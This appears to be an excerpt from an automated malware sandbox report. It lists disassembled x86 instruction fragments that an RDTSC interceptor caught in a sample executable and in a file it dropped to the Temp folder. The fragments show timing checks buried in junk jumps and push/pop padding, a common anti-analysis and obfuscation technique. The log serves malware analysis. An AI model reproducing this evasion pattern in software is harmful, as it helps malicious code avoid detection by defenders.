                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E0035 second address: 52E003A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E003A second address: 52E00B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, al 0x00000005 pushfd 0x00000006 jmp 00007FD668F2A775h 0x0000000b xor al, FFFFFFD6h 0x0000000e jmp 00007FD668F2A771h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 jmp 00007FD668F2A76Eh 0x0000001e sub esp, 2Ch 0x00000021 jmp 00007FD668F2A770h 0x00000026 xchg eax, ebx 0x00000027 jmp 00007FD668F2A770h 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FD668F2A76Dh 0x00000036 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E00B3 second address: 52E00B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E00B9 second address: 52E00D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD668F2A773h 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E01B7 second address: 52E01D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A63Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea ecx, dword ptr [ebp-14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ch, bl 0x00000011 mov edx, eax 0x00000013 popad 0x00000014 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E028A second address: 52E0299 instructions: 0x00000000 rdtsc 0x00000002 mov dx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E0299 second address: 52E029D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E029D second address: 52E02A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E02A1 second address: 52E02A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E02A7 second address: 52E02DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 522Dh 0x00000007 pushfd 0x00000008 jmp 00007FD668F2A76Ah 0x0000000d sub cx, 22C8h 0x00000012 jmp 00007FD668F2A76Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD668F2A76Bh 0x00000025 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E02DD second address: 52E02FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E02FA second address: 52E030B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 mov esi, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E030B second address: 52E030F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E030F second address: 52E0315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E0315 second address: 52E031B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E0346 second address: 52E036C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ebx 0x00000006 popad 0x00000007 mov esi, 56B94C73h 0x0000000c popad 0x0000000d jg 00007FD6D986889Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007FD668F2A76Bh 0x0000001b mov ax, F7BFh 0x0000001f popad 0x00000020 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E036C second address: 52E0400 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 mov edi, 09E4F842h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d js 00007FD668F2A69Bh 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FD668F2A63Fh 0x0000001a sub ecx, 2E437F3Eh 0x00000020 jmp 00007FD668F2A649h 0x00000025 popfd 0x00000026 push esi 0x00000027 mov esi, edi 0x00000029 pop edx 0x0000002a popad 0x0000002b cmp dword ptr [ebp-14h], edi 0x0000002e jmp 00007FD668F2A646h 0x00000033 jne 00007FD6D9868703h 0x00000039 jmp 00007FD668F2A640h 0x0000003e mov ebx, dword ptr [ebp+08h] 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FD668F2A647h 0x00000048 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E0400 second address: 52E042E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A779h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-2Ch] 0x0000000c pushad 0x0000000d mov ebx, eax 0x0000000f movzx eax, di 0x00000012 popad 0x00000013 push ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E042E second address: 52E044B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E044B second address: 52E04E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD668F2A777h 0x00000008 pushfd 0x00000009 jmp 00007FD668F2A778h 0x0000000e add ch, 00000048h 0x00000011 jmp 00007FD668F2A76Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esp], esi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FD668F2A76Bh 0x00000026 and al, FFFFFF8Eh 0x00000029 jmp 00007FD668F2A779h 0x0000002e popfd 0x0000002f pushfd 0x00000030 jmp 00007FD668F2A770h 0x00000035 adc esi, 03E3D408h 0x0000003b jmp 00007FD668F2A76Bh 0x00000040 popfd 0x00000041 popad 0x00000042 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E04E3 second address: 52E052A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FD668F2A63Ch 0x00000011 and cl, FFFFFF98h 0x00000014 jmp 00007FD668F2A63Bh 0x00000019 popfd 0x0000001a mov ax, F34Fh 0x0000001e popad 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E052A second address: 52E0530 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E0530 second address: 52E0558 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov cx, bx 0x00000010 mov ax, di 0x00000013 popad 0x00000014 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: 52E0558 second address: 52E0573 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD668F2A777h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52E0573 second address: 52E05C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FD668F2A63Eh 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FD668F2A63Ch 0x0000001b sub al, 00000048h 0x0000001e jmp 00007FD668F2A63Bh 0x00000023 popfd 0x00000024 mov ebx, esi 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52E05C4 second address: 52E05D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD668F2A770h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52E0617 second address: 52E0652 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD668F2A648h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52E0652 second address: 52E0658 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52E0658 second address: 52D07A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A63Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FD6D9868621h 0x0000000f xor eax, eax 0x00000011 jmp 00007FD668F03D6Ah 0x00000016 pop esi 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 leave 0x0000001a retn 0004h 0x0000001d nop 0x0000001e sub esp, 04h 0x00000021 mov edi, eax 0x00000023 xor ebx, ebx 0x00000025 cmp edi, 00000000h 0x00000028 je 00007FD668F2A847h 0x0000002e call 00007FD66D807DDCh 0x00000033 mov edi, edi 0x00000035 pushad 0x00000036 jmp 00007FD668F2A643h 0x0000003b movzx eax, di 0x0000003e popad 0x0000003f push ecx 0x00000040 jmp 00007FD668F2A640h 0x00000045 mov dword ptr [esp], ebp 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52D07A8 second address: 52D07AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52D07AE second address: 52D07BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD668F2A63Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52D07BD second address: 52D07C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52D07C1 second address: 52D07D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52D07D1 second address: 52D07D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52D07D5 second address: 52D07E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A63Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52D07E3 second address: 52D07E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52D07E9 second address: 52D0825 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a mov cl, bl 0x0000000c popad 0x0000000d mov dword ptr [esp], ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007FD668F2A646h 0x00000019 sbb ecx, 70CC2C28h 0x0000001f jmp 00007FD668F2A63Bh 0x00000024 popfd 0x00000025 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52D0825 second address: 52D0857 instructions: 0x00000000 rdtsc 0x00000002 call 00007FD668F2A778h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dx, 2C46h 0x0000000e popad 0x0000000f mov dword ptr [ebp-04h], 55534552h 0x00000016 pushad 0x00000017 mov di, 7E1Eh 0x0000001b push eax 0x0000001c push edx 0x0000001d push edx 0x0000001e pop esi 0x0000001f rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52E0BD5 second address: 52E0BFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ah, E7h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52E0BFA second address: 52E0BFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52E0BFF second address: 52E0C08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, ADA7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52E0C08 second address: 52E0C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FD668F2A778h 0x0000000d mov ebp, esp 0x0000000f jmp 00007FD668F2A770h 0x00000014 cmp dword ptr [75C7459Ch], 05h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FD668F2A777h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52E0D06 second address: 52E0D5A instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD668F2A63Ah 0x00000008 adc si, E448h 0x0000000d jmp 00007FD668F2A63Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushfd 0x0000001c jmp 00007FD668F2A645h 0x00000021 adc esi, 07B70166h 0x00000027 jmp 00007FD668F2A641h 0x0000002c popfd 0x0000002d rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52E0E24 second address: 52E0E56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A779h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FD6D984E2AAh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD668F2A76Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52E0E56 second address: 52E0EBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD668F2A647h 0x00000008 pop ecx 0x00000009 mov di, BDBCh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 cmp dword ptr [ebp+08h], 00002000h 0x00000017 pushad 0x00000018 mov edi, 7E7C0854h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushfd 0x00000020 jmp 00007FD668F2A643h 0x00000025 sub si, 36EEh 0x0000002a jmp 00007FD668F2A649h 0x0000002f popfd 0x00000030 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52F0982 second address: 52F0987 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52F0987 second address: 52F09D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD668F2A643h 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FD668F2A63Bh 0x00000019 xor ah, 0000004Eh 0x0000001c jmp 00007FD668F2A649h 0x00000021 popfd 0x00000022 mov edx, ecx 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52F09D4 second address: 52F0A0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, D9h 0x00000005 jmp 00007FD668F2A774h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov esi, dword ptr [ebp+0Ch] 0x00000010 jmp 00007FD668F2A770h 0x00000015 test esi, esi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52F0A0B second address: 52F0A11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52F0A11 second address: 52F0A8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, eax 0x00000005 mov ecx, 022CF1EDh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d je 00007FD6D98480FFh 0x00000013 pushad 0x00000014 mov bx, si 0x00000017 call 00007FD668F2A772h 0x0000001c pushfd 0x0000001d jmp 00007FD668F2A772h 0x00000022 or ecx, 4FE68FE8h 0x00000028 jmp 00007FD668F2A76Bh 0x0000002d popfd 0x0000002e pop ecx 0x0000002f popad 0x00000030 cmp dword ptr [75C7459Ch], 05h 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a push esi 0x0000003b pop edx 0x0000003c pushfd 0x0000003d jmp 00007FD668F2A76Ch 0x00000042 add eax, 7E482248h 0x00000048 jmp 00007FD668F2A76Bh 0x0000004d popfd 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52F0A8D second address: 52F0AC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FD6D9860023h 0x0000000f pushad 0x00000010 mov bh, cl 0x00000012 popad 0x00000013 xchg eax, esi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD668F2A63Ch 0x0000001d rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52F0AC5 second address: 52F0AC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52F0AC9 second address: 52F0ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52F0ACF second address: 52F0AE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD668F2A76Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52F0B3B second address: 52F0B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52F0B3F second address: 52F0B4E instructions: 0x00000000 rdtsc 0x00000002 movzx esi, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52F0B4E second address: 52F0B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52F0B52 second address: 52F0B6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A777h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52F0B6D second address: 52F0B73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52F0B73 second address: 52F0B77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52F0BD1 second address: 52F0C00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD668F2A643h 0x00000008 pop ecx 0x00000009 mov ax, di 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD668F2A63Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52F0C00 second address: 52F0C15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A771h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52F0C15 second address: 52F0C1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52F0C1A second address: 52F0C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52F0C28 second address: 52F0C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe  RDTSC instruction interceptor: First address: 52F0C2C second address: 52F0C32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: 97FB32 second address: 97FB44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FD668F2A63Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: 97FB44 second address: 97FB48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: AFE344 second address: AFE368 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A63Ah 0x00000007 jmp 00007FD668F2A646h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: AFE368 second address: AFE372 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD668F2A76Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: AFE76B second address: AFE77B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD668F2A63Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: AFE8A8 second address: AFE8AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: AFEA06 second address: AFEA22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD668F2A641h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B010DE second address: B010ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A76Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
